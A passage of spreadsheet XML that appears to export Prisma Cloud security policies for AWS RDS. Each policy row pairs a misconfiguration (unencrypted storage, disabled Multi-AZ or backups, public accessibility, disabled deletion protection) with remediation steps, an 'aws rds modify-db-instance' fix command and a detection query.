http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.Encryption.html</t>
        </is>
      </c>
      <c r="Y72" t="inlineStr"/>
      <c r="Z72" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-rds-describe-db-instances' AND json.rule= 'engine is not member of ("sqlserver-ex") and  dbinstanceStatus equals available and dbiResourceId does not equal null' as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' as Y; filter '$.X.storageEncrypted does not exist or $.X.storageEncrypted is false or ($.X.storageEncrypted is true and $.X.kmsKeyId exists and $.Y.keyMetadata.keyState equals Disabled and $.X.kmsKeyId equals $.Y.keyMetadata.arn)'; show X;</t>
        </is>
      </c>
      <c r="AA72" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB72" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC72" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-21</t>
        </is>
      </c>
      <c r="AD72" t="b">
        <v>1</v>
      </c>
      <c r="AE72" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF72" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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2" t="inlineStr">
        <is>
          <t>34fa9efb-d18f-41e4-b93f-2f7e5378752c</t>
        </is>
      </c>
      <c r="AI72" t="inlineStr">
        <is>
          <t>34fa9efb-d18f-41e4-b93f-2f7e5378752c</t>
        </is>
      </c>
      <c r="AJ72" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK72" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B73" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C73" s="2" t="inlineStr">
        <is>
          <t>Resilience</t>
        </is>
      </c>
      <c r="D73" t="inlineStr"/>
      <c r="E73" t="inlineStr"/>
      <c r="F73" t="inlineStr"/>
      <c r="G73" t="b">
        <v>0</v>
      </c>
      <c r="H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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J73" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K73" t="inlineStr">
        <is>
          <t>AWS RDS instance with Multi-Availability Zone disabled</t>
        </is>
      </c>
      <c r="L73" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M73" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N73" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O73" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P73" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q73" t="inlineStr">
        <is>
          <t>Recover</t>
        </is>
      </c>
      <c r="R73" t="inlineStr">
        <is>
          <t>Resilience</t>
        </is>
      </c>
      <c r="S73" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Resilience</t>
        </is>
      </c>
      <c r="T73" t="b">
        <v>1</v>
      </c>
      <c r="U73" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V73" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W73" t="inlineStr">
        <is>
          <t>This policy identifies RDS instances which have Multi-Availability Zone(Multi-AZ) disabled. When RDS DB instance is enabled with Multi-AZ, RDS automatically creates a primary DB Instance and synchronously replicates the data to a standby instance in a different availability zone. These Multi-AZ deployments will improve primary node reachability by providing read replica in case of network connectivity loss or loss of availability in the primary’s availability zone for read/write operations, so by making them the best fit for production database workloads.</t>
        </is>
      </c>
      <c r="X73" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Amazon RDS console
4. Choose Instances, and then select the reported DB instance
5. Click on 'Modify'
6. In 'Availability &amp; durability' section for the 'Multi-AZ Deployment', select 'Create a standby instance'
7. Click on 'Continue'
8. Under 'Scheduling of modifications' choose 'When to apply modifications'
9. On the confirmation page, Review the changes and Click on 'Modify DB Instance' to save your changes.</t>
        </is>
      </c>
      <c r="Y73" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBInstance' permission. Successful execution will enable 'Multi-AZ Deployment' for the respective RDS.",
'impact': 'Enable AWS RDS instance with Multi-Availability Zone',
'cliScriptTemplate': 'aws rds modify-db-instance --region $region --db-instance-identifier $resourceName --region $region --multi-az --apply-immediately'</t>
        </is>
      </c>
      <c r="Z73" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-db-instances' AND json.rule = dbinstanceStatus equals available and (engine does not contain aurora and engine does not contain sqlserver and engine does not contain docdb) and (multiAZ is false or multiAZ does not exist)</t>
        </is>
      </c>
      <c r="AA73" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB73" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC73" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-218</t>
        </is>
      </c>
      <c r="AD73" t="b">
        <v>1</v>
      </c>
      <c r="AE73" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF73" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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3" t="inlineStr">
        <is>
          <t>c5305272-a732-4e8e-8427-6a9701cd2a6f</t>
        </is>
      </c>
      <c r="AI73" t="inlineStr">
        <is>
          <t>f606fe0b-2950-42ce-a3b2-7f100ece5c3a</t>
        </is>
      </c>
      <c r="AJ73" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK73" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B74" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C74" s="2" t="inlineStr">
        <is>
          <t>Inventory</t>
        </is>
      </c>
      <c r="D74" t="inlineStr"/>
      <c r="E74" t="inlineStr"/>
      <c r="F74" t="inlineStr"/>
      <c r="G74" t="b">
        <v>1</v>
      </c>
      <c r="H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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J74" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K74" t="inlineStr">
        <is>
          <t>AWS RDS instance with copy tags to snapshots disabled</t>
        </is>
      </c>
      <c r="L74" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M74" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N74" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O74" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P74" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q74" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R74" t="inlineStr">
        <is>
          <t>Inventory</t>
        </is>
      </c>
      <c r="S74" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Inventory</t>
        </is>
      </c>
      <c r="T74" t="b">
        <v>1</v>
      </c>
      <c r="U74" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V74" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W74" t="inlineStr">
        <is>
          <t>This policy identifies RDS instances that have copy tags to snapshots disabled. Copy tags to snapshots copies all the user-defined tags from the DB instance to snapshots. Copying tags allow you to add metadata and apply access policies to your Amazon RDS resources.
NOTE: Setting Copy tags to snapshots for an Aurora DB instance has no effect on the DB setting. So Aurora DB instances are excluded from policy check.</t>
        </is>
      </c>
      <c r="X74" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Amazon RDS console
4. Choose DB Instances, and then select the reported DB instance
5. Click on 'Modify'
6. In 'Additional Configuration' section, In 'Backup' sub-section select the 'Copy tags to snapshots'
7. Click on 'Continue'
8. On the 'Summary of Modifications' panel, review the configuration changes. From 'Scheduling of Modifications' section, select whether changes to 'Apply immediately' or 'Apply during the next scheduled maintenance window'.
9. On the confirmation page, Review the changes and Click on 'Modify DB Instance' to save your changes. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-60
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-60</t>
        </is>
      </c>
      <c r="Y74" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBInstance' permission. Successful execution will enable 'copy tags to snapshots' for the respective RDS.",
'impact': 'Enable copy tags to snapshots for the respective RDS',
'cliScriptTemplate': 'aws rds modify-db-instance --region $region --db-instance-identifier $resourceName --copy-tags-to-snapshot --apply-immediately'</t>
        </is>
      </c>
      <c r="Z74" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-db-instances' AND json.rule = dbinstanceStatus equals available and (copyTagsToSnapshot is false or copyTagsToSnapshot does not exist) and engine does not contain aurora and engine does not contain docdb and engine does not contain neptune
{"category":"General","resourceTypes":["aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA74" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB74" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC74" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-219-CKV2_AWS_60</t>
        </is>
      </c>
      <c r="AD74" t="b">
        <v>1</v>
      </c>
      <c r="AE74" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF74" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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4" t="inlineStr">
        <is>
          <t>1f524c07-3254-45a0-8ad7-03e29242c499</t>
        </is>
      </c>
      <c r="AI74" t="inlineStr">
        <is>
          <t>56b18fc7-71e4-4932-aba6-71b9d0c6cf5d</t>
        </is>
      </c>
      <c r="AJ74" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK74" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B75" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C75" s="2" t="inlineStr">
        <is>
          <t>Resilience</t>
        </is>
      </c>
      <c r="D75" t="inlineStr"/>
      <c r="E75" t="inlineStr"/>
      <c r="F75" t="inlineStr"/>
      <c r="G75" t="b">
        <v>1</v>
      </c>
      <c r="H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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J75" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K75" t="inlineStr">
        <is>
          <t>AWS RDS instance without Automatic Backup setting</t>
        </is>
      </c>
      <c r="L75" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M75" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N75" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O75" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P75" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q75" t="inlineStr">
        <is>
          <t>Recover</t>
        </is>
      </c>
      <c r="R75" t="inlineStr">
        <is>
          <t>Resilience</t>
        </is>
      </c>
      <c r="S75" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Resilience</t>
        </is>
      </c>
      <c r="T75" t="b">
        <v>1</v>
      </c>
      <c r="U75" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V75" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W75" t="inlineStr">
        <is>
          <t>This policy identifies RDS instances which are not set with the Automatic Backup setting. If Automatic Backup is set, RDS creates a storage volume snapshot of your DB instance, backing up the entire DB instance and not just individual databases which provide for point-in-time recovery. The automatic backup will happen during the specified backup window time and keeps the backups for a limited period of time as defined in the retention period. It is recommended to set Automatic backups for your critical RDS servers that will help in the data restoration process.</t>
        </is>
      </c>
      <c r="X75" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Amazon RDS console
4. Choose Instances, and then select the reported DB instance
5. On 'Instance Actions' drop-down list, choose 'Modify'
6. In 'Backup' section,
a. From the 'Backup Retention Period' drop-down list, select the number of days you want RDS should retain automatic backups of this DB instance
b. Choose 'Start Time' and 'Duration' in 'Backup window' which is the daily time range (in UTC) during which automated backups created
7. Click on 'Continue'
8. On the confirmation page, choose 'Modify DB Instance' to save your changes 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-rds-instances-have-backup-policy
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-rds-instances-have-backup-policy</t>
        </is>
      </c>
      <c r="Y75" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBInstance' permission. Successful execution will enable the automatic back up settings for RDS instances",
'impact': 'Configure AWS RDS instance with Automatic Backup setting',
'cliScriptTemplate': 'aws rds modify-db-instance --region $region --db-instance-identifier $resourceName --backup-retention-period 30 --apply-immediately'</t>
        </is>
      </c>
      <c r="Z75" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-db-instances' AND json.rule = 'backupRetentionPeriod equals 0 or backupRetentionPeriod does not exist'
{"category":"General","resourceTypes":["aws_rds_cluster"]}</t>
        </is>
      </c>
      <c r="AA75" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB75" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC75" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-217-CKV_AWS_133</t>
        </is>
      </c>
      <c r="AD75" t="b">
        <v>1</v>
      </c>
      <c r="AE75" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF75" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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5" t="inlineStr">
        <is>
          <t>3a6797a0-2420-4b27-b06b-9eec275c233f</t>
        </is>
      </c>
      <c r="AI75" t="inlineStr">
        <is>
          <t>9f3a429b-53f7-4d54-b6a1-dd434d0599dd</t>
        </is>
      </c>
      <c r="AJ75" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK75" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B76" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C76" s="2" t="inlineStr">
        <is>
          <t>Detection services</t>
        </is>
      </c>
      <c r="D76" t="inlineStr"/>
      <c r="E76" t="inlineStr"/>
      <c r="F76" t="inlineStr"/>
      <c r="G76" t="b">
        <v>1</v>
      </c>
      <c r="H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kfirdaus-alert-rule2,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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J76" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K76" t="inlineStr">
        <is>
          <t>AWS RDS minor upgrades not enabled</t>
        </is>
      </c>
      <c r="L76" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M76" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N76" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O76" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P76" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q76" t="inlineStr">
        <is>
          <t>Detect</t>
        </is>
      </c>
      <c r="R76" t="inlineStr">
        <is>
          <t>Detection services</t>
        </is>
      </c>
      <c r="S76" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Detection services</t>
        </is>
      </c>
      <c r="T76" t="b">
        <v>1</v>
      </c>
      <c r="U76" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V76" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W76" t="inlineStr">
        <is>
          <t>When Amazon Relational Database Service (Amazon RDS) supports a new version of a database engine, you can upgrade your DB instances to the new version. There are two kinds of upgrades: major version upgrades and minor version upgrades. Minor upgrades helps maintain a secure and stable RDS with minimal impact on the application. For this reason, we recommend that your automatic minor upgrade is enabled. Minor version upgrades only occur automatically if a minor upgrade replaces an unsafe version, such as a minor upgrade that contains bug fixes for a previous version.</t>
        </is>
      </c>
      <c r="X76" t="inlineStr">
        <is>
          <t>Enable RDS auto minor version upgrades.
1. Go to the AWS console RDS dashboard.
2. In the navigation pane, choose Instances.
3. Select the database instance you wish to configure.
4. From the 'Instance actions' menu, select Modify.
5. Under the Maintenance section, choose Yes for Auto minor version upgrade.
6. Select Continue and then Modify DB Instance.</t>
        </is>
      </c>
      <c r="Y76" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBInstance' permission. Successful execution will enable the minor upgrades of RDS datsbase instance",
'impact': 'RDS minor upgrades will be enabled',
'cliScriptTemplate': 'aws rds modify-db-instance --region $region --db-instance-identifier $resourceName --auto-minor-version-upgrade --apply-immediately'</t>
        </is>
      </c>
      <c r="Z76" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-db-instances' AND json.rule = dbinstanceStatus equals available and autoMinorVersionUpgrade is false and engine does not contain docdb and engine does not contain neptune</t>
        </is>
      </c>
      <c r="AA76" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB76" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC76" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-260</t>
        </is>
      </c>
      <c r="AD76" t="b">
        <v>1</v>
      </c>
      <c r="AE76" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF76" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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kfirdaus-alert-rule2 - Notifications:email,jira, AccountGroups:kfirdaus-GCP-acct-group;,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6" t="inlineStr">
        <is>
          <t>9dd6cc35-1855-48c8-86ba-0e1818ce11e2</t>
        </is>
      </c>
      <c r="AI76" t="inlineStr">
        <is>
          <t>d280f6cc-20ce-41e2-a29e-e23c6b3f8b6d</t>
        </is>
      </c>
      <c r="AJ76" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK76" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B77" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C77" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D77" t="inlineStr"/>
      <c r="E77" t="inlineStr"/>
      <c r="F77" t="inlineStr"/>
      <c r="G77" t="b">
        <v>1</v>
      </c>
      <c r="H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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J77" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K77" t="inlineStr">
        <is>
          <t>AWS RDS database instance is publicly accessible</t>
        </is>
      </c>
      <c r="L77" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M77" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N77" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O77" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P77" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q77" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R77" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S77" t="inlineStr">
        <is>
          <t>Attack Path Rule,Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T77" t="b">
        <v>1</v>
      </c>
      <c r="U77" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V77" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W77" t="inlineStr">
        <is>
          <t>This policy identifies RDS database instances which are publicly accessible. DB instances should not be publicly accessible to protect the integrity of data. Public accessibility of DB instances can be modified by turning on or off the Public accessibility parameter.</t>
        </is>
      </c>
      <c r="X77" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console.
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to the 'RDS' service.
4. Select the RDS instance reported in the alert, Click on 'Modify' 
5. Under 'Network and Security', update the value of 'public accessibility' to 'No' and Click on 'Continue'
6. Select required 'Scheduling of modifications' option and click on 'Modify DB Instance' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/public-policies/public-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/public-policies/public-2</t>
        </is>
      </c>
      <c r="Y77" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBInstance' permission. Successful execution will disable the publicly accessible configuration of AWS RDS database instances",
'impact': 'AWS RDS database instance to disable the public settings',
'cliScriptTemplate': 'aws rds modify-db-instance --region $region --db-instance-identifier $resourceName --no-publicly-accessible --apply-immediately'</t>
        </is>
      </c>
      <c r="Z77" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-rds-describe-db-instances' AND json.rule = 'publiclyAccessible is true'
{"category":"Public","resourceTypes":["aws_db_instance","aws_rds_cluster_instance"]}</t>
        </is>
      </c>
      <c r="AA77" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB77" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC77" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-99-CKV_AWS_17</t>
        </is>
      </c>
      <c r="AD77" t="b">
        <v>1</v>
      </c>
      <c r="AE77" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF77" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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7" t="inlineStr">
        <is>
          <t>1bb6005a-dca6-40e2-b0a6-24da968c0808</t>
        </is>
      </c>
      <c r="AI77" t="inlineStr">
        <is>
          <t>b3897fb4-5241-403b-8770-69f90cea0f11</t>
        </is>
      </c>
      <c r="AJ77" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK77" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B78" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C78" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D78" t="inlineStr"/>
      <c r="E78" t="inlineStr"/>
      <c r="F78" t="inlineStr"/>
      <c r="G78" t="b">
        <v>0</v>
      </c>
      <c r="H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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J78" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K78" t="inlineStr">
        <is>
          <t>AWS RDS instance delete protection is disabled</t>
        </is>
      </c>
      <c r="L78" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M78" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N78" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O78" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P78" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q78" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R78" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S78" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T78" t="b">
        <v>1</v>
      </c>
      <c r="U78" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V78" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W78" t="inlineStr">
        <is>
          <t>This policy identifies RDS instances for which delete protection is disabled. Enabling delete protection for these RDS instances prevents irreversible data loss resulting from accidental or malicious operations.</t>
        </is>
      </c>
      <c r="X78" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the Amazon RDS dashboard 
4. Click on the DB instances
5. Select the reported DB instance
6. Click on the 'Modify' button
7. In Modify DB instance page, In the 'Additional configuration' section, Check the box 'Enable deletion protection' for Deletion protection.</t>
        </is>
      </c>
      <c r="Y78" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBInstance' permission. Successful execution will enable deletion protection for the reported AWS RDS instance.",
'impact': 'Enables deletion protection setting for AWS RDS instance',
'cliScriptTemplate': 'aws rds modify-db-instance --db-instance-identifier $resourceName --region $region --deletion-protection'</t>
        </is>
      </c>
      <c r="Z78" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-db-instances' AND json.rule = dbinstanceStatus contains available and dbclusterIdentifier does not exist and deletionProtection is false</t>
        </is>
      </c>
      <c r="AA78" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB78" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC78" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-703</t>
        </is>
      </c>
      <c r="AD78" t="b">
        <v>1</v>
      </c>
      <c r="AE78" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF78" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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8" t="inlineStr">
        <is>
          <t>77b203a1-1d4b-442c-92c0-0c391ae4955f</t>
        </is>
      </c>
      <c r="AI78" t="inlineStr">
        <is>
          <t>ff085824-1fdc-42bc-97ca-097a68e86623</t>
        </is>
      </c>
      <c r="AJ78" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK78" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B79" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C79" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D79" t="inlineStr"/>
      <c r="E79" t="inlineStr"/>
      <c r="F79" t="inlineStr"/>
      <c r="G79" t="b">
        <v>1</v>
      </c>
      <c r="H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79" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J79" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K79" t="inlineStr">
        <is>
          <t>AWS RDS snapshots are accessible to public</t>
        </is>
      </c>
      <c r="L79" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M79" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N79" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O79" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P79" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q79" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R79" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S79" t="inlineStr">
        <is>
